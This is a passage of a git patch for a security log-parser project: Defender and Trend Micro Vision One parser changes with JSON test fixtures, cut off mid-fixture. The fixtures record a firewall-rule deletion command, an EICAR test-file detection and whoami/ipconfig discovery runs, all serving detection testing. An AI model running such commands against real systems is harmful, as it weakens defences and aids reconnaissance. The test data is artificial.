\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "process" @@ -19,115 +19,73 @@ "info" ] }, - "@timestamp": "2024-11-08T14:38:51.907372Z", + "@timestamp": "2024-10-22T15:09:44.594155Z", "action": { "properties": { - "AccountSid": "S-1-2-3", - "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "InitiatingProcessFileSize": 145408, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", - "InitiatingProcessVersionInfoInternalFileName": "file", - "InitiatingProcessVersionInfoOriginalFileName": "file.exe", - "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", - "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", - "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessTokenElevation": "TokenElevationTypeDefault", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Network Command Shell", - "ProcessVersionInfoInternalFileName": "processcommand.exe", - "ProcessVersionInfoOriginalFileName": "processcommand.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "10.0.22621.1" + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, "file": { - "directory": "C:\\Windows\\processcommand.exe", + "directory": "/usr/bin/ps", "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + "md5": "098f6bcd4621d373cade4e832627b4f6", + "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" }, - "name": "processcommand.exe", - "size": 82944 + "name": "ps", + "size": 144632 }, "host": { - "id": "123456789abcdef", - "name": "host.group.local" + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" }, "microsoft": { "defender": { "report": { - "id": "17318" + "id": "67417" } } }, "process": { "args": [ - "HTTP", - "advfirewall", - "delete", - "embedded", - "firewall", - "incoming", - "name=\"program=description=", - "rule", - "server", - "traffic\"" + "--no-headers", + "-A", + "-o", + "comm,pid,pcpu,pmem,rss,etimes" ], - "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", - "name": "processcommand.exe", + "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "args": [ - "-Embedding", - "ABCDEF0123456789", - "E", - "Global\\HOST0000" - ], "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" + "status": "Unknown", + "subject_name": "Unknown" }, - "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "executable": "c:\\windows\\file.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "file.exe", - "pid": 10868, - "start": "2024-11-08T14:38:00.674494Z", + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", "user": { - "domain": "account domain", - "id": "S-1-2-3", - "name": "syst\u00e8me" - }, - "working_directory": "c:\\windows" + "domain": "computer", + "name": "root" + } }, - "pid": 4520, - "start": "2024-11-08T14:38:51.903048Z", - "working_directory": "C:\\Windows" + "pid": 423627, + "start": "2024-10-22T15:09:44.594155Z", + "working_directory": "/usr/bin" }, "related": { "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - "51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", - "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + "098f6bcd4621d373cade4e832627b4f6", + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", + "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" ], "user": [ - "syst\u00e8me" + "root" ] }, "user": { - "domain": "account domain", - "name": "syst\u00e8me" + "domain": "computer", + "name": "root" } } } \ No newline at end of file From db978530c9756d0b397b872be52be2cb07b45727 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 28 Nov 2024 14:58:43 +0200 Subject: [PATCH 79/84] Trend Micro Vision One - improve parser --- .../trend-micro-vision-one/_meta/fields.yml | 10 +++ .../trend-micro-vision-one/ingest/parser.yml | 54 +++++++------ .../tests/test_eicar_test_file_detection.json | 57 ++++++++++++++ .../tests/test_information_gathering.json | 76 +++++++++++++++++++ .../tests/test_internal_network_scanner.json | 1 + .../tests/test_process.json | 1 + .../tests/test_project_injection.json | 76 +++++++++++++++++++ .../tests/test_registry.json | 1 + .../tests/test_service_abuse.json | 74 ++++++++++++++++++ 9 files changed, 328 insertions(+), 22 deletions(-) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_project_injection.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml index f18d3cb5d..2f93f2919 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/fields.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml @@ -1,3 +1,8 @@ +action.properties.ScriptBlockText: + description: '' + name: action.properties.ScriptBlockText + type: keyword + trendmicro.vision_one.alert_id: description: '' name: trendmicro.vision_one.alert_id @@ -8,6 +13,11 @@ trendmicro.vision_one.case_id: name: trendmicro.vision_one.case_id type: keyword +trendmicro.vision_one.detection_name: + description: '' + name: trendmicro.vision_one.detection_name + type: keyword + trendmicro.vision_one.incident_id: description: '' name: trendmicro.vision_one.incident_id diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 09ca7f331..0353bb37b 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,12 +25,13 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" - host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" - user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" - container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" - container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" rule.name: "{{parsed_event.message.model}}" rule.id: "{{parsed_event.message.model.modelId}}" @@ -38,7 +39,7 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" - set: - user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" - set: user.name: "{{final.user.id.split('\\\\') | last}}" @@ -46,18 +47,23 @@ stages: filter: "{{final.user.id != null}}" - set: - process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" - process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" + + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" - set: - registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" - registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} @@ -68,19 +74,22 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" - set: registry.data.type: "REG_SZ" filter: "{{final.registry.data.strings != null }}" - set: - file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" - file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" - file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" - file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" @@ -89,3 +98,4 @@ stages: trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" trendmicro.vision_one.status: "{{parsed_event.message.status}}" trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..5fb30866d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json @@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json new file mode 100644 index 000000000..4d60422b4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": 